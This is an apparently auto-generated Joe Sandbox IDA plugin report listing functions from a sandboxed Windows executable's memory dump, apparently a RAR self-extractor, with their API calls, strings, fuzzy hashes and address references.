Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: 657123a7913344ab9a97147e8efb5658b1a5a6e789d1f0cda9d2c80b18b5b205
Instruction ID: c98fa5d4027511e279c3724c347cc2ea642e75a90eb8ea83ea04bd3427bab249
Opcode Fuzzy Hash: 657123a7913344ab9a97147e8efb5658b1a5a6e789d1f0cda9d2c80b18b5b205
Instruction Fuzzy Hash: 9EC1F6B2D002289BDF44CF9AD8405DEFBF2BFC8310F6AC1A6D81577615D6346A528F91

Function 0040C1F2 Relevance: 1.4, Strings: 1, Instructions: 166COMMON

Download Yara Rule

Strings

uC, xrefs: 0040C2D2

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID:
String ID: uC
API String ID: 0-1504446725
Opcode ID: 4225a3f65b1add8b01a9b237843835b186457abcf32bb453e39df3bc5c07f441
Instruction ID: addd6794abc7c4b83cb25fbe6fd214ac8495ccae486528f5342779a39c59b0a2
Opcode Fuzzy Hash: 4225a3f65b1add8b01a9b237843835b186457abcf32bb453e39df3bc5c07f441
Instruction Fuzzy Hash: 6951FB71904288DACF16CFA4C0D05EDBFB0EF5A324F6981BFD9857B282C2356646CB95

Function 004167C9 Relevance: .8, Instructions: 835COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: cc24209809fbba7389bcecec772fc5a7a4121990f98961c80a31fbae75bfb964
Instruction ID: 7fffe137336aba7910a7ae2595e9bea299c57f0ec6f9df4147348687255e2aef
Opcode Fuzzy Hash: cc24209809fbba7389bcecec772fc5a7a4121990f98961c80a31fbae75bfb964
Instruction Fuzzy Hash: 1B72E470A047459FCB29CF24C5D06EABBF1EF55308F1585AED9968B342C338E985CB58

Function 00415935 Relevance: .8, Instructions: 795COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 161e8830b476707be7e8012dc46a74aaff8e06e443662513d50fe35ba02413bb
Instruction ID: 1557afb9394d6997260812b6c728ba0a748e7d0238bc4e0094cdbdff9681b5a5
Opcode Fuzzy Hash: 161e8830b476707be7e8012dc46a74aaff8e06e443662513d50fe35ba02413bb
Instruction Fuzzy Hash: 5572AF70A04645DFCB19CF24C5806EDBBB1FF85308F2881AED85A8B742C339E986CB55

Function 0041B859 Relevance: .4, Instructions: 384COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction ID: 81706c41d5be9f3ee4a1a744d6a10c8785f8af3fc2a1a8b8a43e64a1261b1d98
Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction Fuzzy Hash: 9DD18073D1B9B3068735822D409817BEEA2AFC164031EC3E2ECE43F389D22A5D9195D4

Function 0041B439 Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction ID: 13731bd06db4ee1a9bd9eb9740296785b7cdc3a817d97b0d4ee93e851737f6f3
Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction Fuzzy Hash: D8D18373D0B9B30A8735822D409417BEEA2AFD174131EC3E2ECE42F389D62A5D9595D4

Function 0041B02D Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction ID: 2193f905835b3fd8d0147d8ae1d1a525943c85733a763651b7fe950ddf72e189
Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction Fuzzy Hash: DEC16373D0B9B3068735822D40A816FEEA2AFD175131FC3E2ACE42F389D22A5D9495D4

Function 0041AC59 Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction ID: 8696b15fa516f3527af19811d279e6ad57c6034573e9222b5aa6e1833b2b4935
Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction Fuzzy Hash: ADC18173D0B9B30A8735822D40585BBEEA36FD174131EC3E2ECE42F389D22A5CA595D5

Function 004141CE Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5beaf0a9f4c4c849a3d0d889cb103b964ca7782851a091b67af86808a26b1e89
Instruction ID: 2042ab5ecd9d1234b98e80f9b1ae561472cc12ad5ee0c46ffc3b28a5bf4547b2
Opcode Fuzzy Hash: 5beaf0a9f4c4c849a3d0d889cb103b964ca7782851a091b67af86808a26b1e89
Instruction Fuzzy Hash: EA810871200609ABDB15DE69C891BFD73A5EB90318F10842FFD669B282C77CD9C2CB59

Function 0040C816 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c67adc9bdbcfeae4007d90d3c7926c8e792a1d180af7b4e9eb3d23070c14a9e
Instruction ID: cf9f76de3413190e011bddae6863abf5ad085049fd2a9d845bb1b7efbd21528b
Opcode Fuzzy Hash: 2c67adc9bdbcfeae4007d90d3c7926c8e792a1d180af7b4e9eb3d23070c14a9e
Instruction Fuzzy Hash: 9AC15FB4C185D99ECF12DFA5D4A08FEBFF4AF1A241B0910DAE9D4A7252C2349720DF64

Function 0040C449 Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebaf950f54676bac682397af9a5d3b187086251eced4c07a08f3567b9e8006e1
Instruction ID: 44bafdadf3e40f45a4f8ba23cf4b46ecc072278150b1476d7814b5b1a9cc95d9
Opcode Fuzzy Hash: ebaf950f54676bac682397af9a5d3b187086251eced4c07a08f3567b9e8006e1
Instruction Fuzzy Hash: 2981E55620E2E08EE71AC73C14E96F63F911F72100B2EA6EEC4CD4F2D7D6660619D729

Function 004140B2 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d03be13620e38b50b4348ac48f092bc9a30a88bce5a619f68846d7c519b6b8c
Instruction ID: 475e4900815a9505fde966304f8df12a6f1c78e85bbbe5334b05452bb608b41b
Opcode Fuzzy Hash: 8d03be13620e38b50b4348ac48f092bc9a30a88bce5a619f68846d7c519b6b8c
Instruction Fuzzy Hash: 6D31F371610615ABCB00DF79C8952DDBBE1EB95308F10816EE4A5EB382D27DA989CB84

Function 004055AD Relevance: .1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed9068bfa639142bf8b4c38fd82cdfd16adbe522c08585add70b4bf8b4f81ab1
Instruction ID: 62ca0eb4193783eb801c3a2f2bf301faeaa12bbf0a015957bd3022d06a4c4e95
Opcode Fuzzy Hash: ed9068bfa639142bf8b4c38fd82cdfd16adbe522c08585add70b4bf8b4f81ab1
Instruction Fuzzy Hash: 5E21C672A145716BD7048F65EC9452733A3D7CA32179A5233DF805B3B5D134B922CAE8

Function 00410A5D Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8242d2adca0ee77033965afe3d9840a22183be55bece64a87820915d62a16758
Instruction ID: 77424a9f50feaefcaa5df40da88327ffa6b722fbc8496fb74382e688b99152ba
Opcode Fuzzy Hash: 8242d2adca0ee77033965afe3d9840a22183be55bece64a87820915d62a16758
Instruction Fuzzy Hash: 81F082B26407059AE720DE58D8467EBBBE8FF20748F20841FD5A6E62C0C2F8D5C1CA49

Function 0040A5BC Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 139COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0040A5E3
_wcsncpy.LIBCMT ref: 0040A61A
_wcscpy.LIBCMT ref: 0040A624

Strings

UNC, xrefs: 0040A667
\\?\, xrefs: 0040A614, 0040A659, 0040A6C5, 0040A71D

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: _wcscpy_wcslen_wcsncpy
String ID: UNC$\\?\
API String ID: 677062453-253988292
Opcode ID: 31f036d748028cf8f5463ced1d693ab6ab69f0f18b28585f0506cdb2337a72da
Instruction ID: 1662e797052e27df86e1d5e47fcb708ac808cae5bbdf2998b59d7d065d095f7f
Opcode Fuzzy Hash: 31f036d748028cf8f5463ced1d693ab6ab69f0f18b28585f0506cdb2337a72da
Instruction Fuzzy Hash: 5B419975900318A6CB21BA61CC41BEB33796F05758F18843BF955732C2E77CE9E186AB

Function 004192F7 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 125memoryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0041931D
_malloc.LIBCMT ref: 0041932A

Part of subcall function 0041CAFE: __FF_MSGBANNER.LIBCMT ref: 0041CB21
Part of subcall function 0041CAFE: __NMSG_WRITE.LIBCMT ref: 0041CB28
Part of subcall function 0041CAFE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00420EB4,00000000,00000001,00000000,?,0041EAED,00000018,0042D8B8,0000000C,0041EB7E), ref: 0041CB75

_wcscpy.LIBCMT ref: 00419343
_wcscat.LIBCMT ref: 0041934E
_wcscat.LIBCMT ref: 00419359
_wcscat.LIBCMT ref: 00419394
_wcscat.LIBCMT ref: 004193A5
_wcslen.LIBCMT ref: 004193BE
GlobalAlloc.KERNEL32(00000040,-00000009,?,<html>,00000006), ref: 004193CF
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,-00000106,00000000,00000000), ref: 004193F0
CreateStreamOnHGlobal.OLE32(00000000,00000001,00000000), ref: 00419418

Strings

<html>, xrefs: 0041933C, 00419341, 00419379
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00419348
</html>, xrefs: 0041939F
utf-8"></head>, xrefs: 00419353

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: _wcscat$Global_wcslen$AllocAllocateByteCharCreateHeapMultiStreamWide_malloc_wcscpy
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 4158105118-4209811716
Opcode ID: b96788d715a7bf62ce6ea7c986b7857ec31a1a2725e05999433294f104e24dd2
Instruction ID: f7feff3ea49ef3e1296651f4e63a99f5bfa22b015105f5c5919a5d656c3bb26d
Opcode Fuzzy Hash: b96788d715a7bf62ce6ea7c986b7857ec31a1a2725e05999433294f104e24dd2
Instruction Fuzzy Hash: 16311832904218BBDB11ABB19C55FEE37689F06324F14415FFC21AB2C2DB7C5D82836A

Function 0041961B Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000,00000000,?,?), ref: 00419635

Part of subcall function 004195B4: LoadCursorW.USER32 ref: 004195EB
Part of subcall function 004195B4: RegisterClassExW.USER32 ref: 0041960C

GetWindowRect.USER32 ref: 00419656
GetParent.USER32 ref: 00419669
MapWindowPoints.USER32 ref: 0041966E
DestroyWindow.USER32(?), ref: 0041967C
GetParent.USER32 ref: 0041969A
CreateWindowExW.USER32(00000000,RarHtmlClassName,00000000,40000000,?,?,?,?,00000000), ref: 004196B9
ShowWindow.USER32(?,00000005,?), ref: 004196EB
SetWindowTextW.USER32(?,00000000), ref: 004196F5
ShowWindow.USER32(00000000,00000005), ref: 0041970B
UpdateWindow.USER32(?), ref: 00419714

Strings

RarHtmlClassName, xrefs: 004196B3

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: Window$Show$Parent$ClassCreateCursorDestroyLoadPointsRectRegisterTextUpdate
String ID: RarHtmlClassName
API String ID: 3841971108-1658105358
Opcode ID: 9e9ce1ef8281972d43b90b69773ce669ecea7d22ee09c57334953fc587a13e1a
Instruction ID: 5f92269131ddc5918b43d9cce9f816c06abde4a4ac5ab7311a7da095659db57d
Opcode Fuzzy Hash: 9e9ce1ef8281972d43b90b69773ce669ecea7d22ee09c57334953fc587a13e1a
Instruction Fuzzy Hash: 4E31A331600604EFCB319F64DC48EAFBBB9EF44741F10451AF856923A0D735AD91CBA9

Function 00405120 Relevance: 21.1, APIs: 14, Instructions: 91COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 0040513E
_wcslen.LIBCMT ref: 00405146
_wcscpy.LIBCMT ref: 00405156
_wcslen.LIBCMT ref: 0040515C
_wcscpy.LIBCMT ref: 00405174
_wcslen.LIBCMT ref: 0040517A
_wcscpy.LIBCMT ref: 00405189
_wcslen.LIBCMT ref: 0040518F
_memset.LIBCMT ref: 004051A4
GetSaveFileNameW.COMDLG32(?,?,?,?,?,?,000000A2), ref: 004051F0
GetOpenFileNameW.COMDLG32(?,?,?,?,?,?,000000A2), ref: 004051F8
CommDlgExtendedError.COMDLG32(?,?,?,?,?,000000A2), ref: 00405200
GetSaveFileNameW.COMDLG32(?,?,?,?,?,?,000000A2), ref: 0040521C
GetOpenFileNameW.COMDLG32(?,?,?,?,?,?,000000A2), ref: 00405224

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: FileName_wcscpy_wcslen$OpenSave$CommErrorExtended_memset
String ID:
API String ID: 3496903968-0
Opcode ID: 7d35437bc844db6c5139406fd3202ff4015844ff5c57abb798ba1eccdcd4c2cf
Instruction ID: 172420e5b3c94e83cba95d00332743140d9e91384160174f30774783fbd1a230
Opcode Fuzzy Hash: 7d35437bc844db6c5139406fd3202ff4015844ff5c57abb798ba1eccdcd4c2cf
Instruction Fuzzy Hash: B331F571901618ABCB11AFA5DC45BDF7BB8EF04354F50002BFC04B7241DB3899A58FAA

Function 00419889 Relevance: 19.6, APIs: 13, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00419895
CreateCompatibleDC.GDI32(00000000), ref: 004198A5
CreateCompatibleDC.GDI32(?), ref: 004198AC
GetObjectW.GDI32(?,00000018,?), ref: 004198BA
CreateCompatibleBitmap.GDI32 ref: 004198DC
SelectObject.GDI32 ref: 004198EF
SelectObject.GDI32 ref: 004198FA
StretchBlt.GDI32 ref: 00419918
SelectObject.GDI32 ref: 00419922
SelectObject.GDI32 ref: 0041992A
DeleteDC.GDI32 ref: 00419933
DeleteDC.GDI32 ref: 00419938
ReleaseDC.USER32(00000000,?), ref: 0041993E

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: Object$Select$CompatibleCreate$Delete$BitmapReleaseStretch
String ID:
API String ID: 3950507155-0
Opcode ID: 645663dba6679b36ad936e8b2df9ede2b2f8713d484d9860903d99ab566a2af6
Instruction ID: d51d06e271f59881509f8fe5658a3f558a6309e2dc6ea558688974f3dc61ade3
Opcode Fuzzy Hash: 645663dba6679b36ad936e8b2df9ede2b2f8713d484d9860903d99ab566a2af6
